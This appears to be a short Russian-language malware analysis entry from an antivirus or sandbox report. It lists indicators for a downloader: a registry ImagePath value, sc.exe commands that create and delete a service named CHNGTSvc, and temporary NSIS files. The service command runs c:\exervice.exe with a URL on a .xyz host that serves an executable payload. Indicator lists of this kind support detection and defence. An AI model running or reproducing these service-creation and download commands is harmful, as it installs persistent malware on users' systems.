Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.cfe800d9c09442eea8995c595ac4b55bbd2645e0.xyz/download/xpack1014_AR_HK_MX_NL_SG.1476456715.exe'
- '%TEMP%\nsp2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####00d9c09442eea8995c595ac4b55bbd2645e0.xyz/download/xpack1014_AR_HK_MX_NL_SG.1476456715.exe"
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####00d9c09442eea8995c595ac4b55bbd2645e0.xyz/download/xpack1014_AR_HK_MX_NL_SG.1476456715.exe"
- '%TEMP%\nsp2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- %TEMP%\nsp2.tmp\ns3.tmp
- %TEMP%\nsp2.tmp\ns4.tmp
- C:\exervice.exe
- %TEMP%\nsp2.tmp\nsExec.dll
- %TEMP%\nsp2.tmp\ns4.tmp
- %TEMP%\nsp2.tmp\ns3.tmp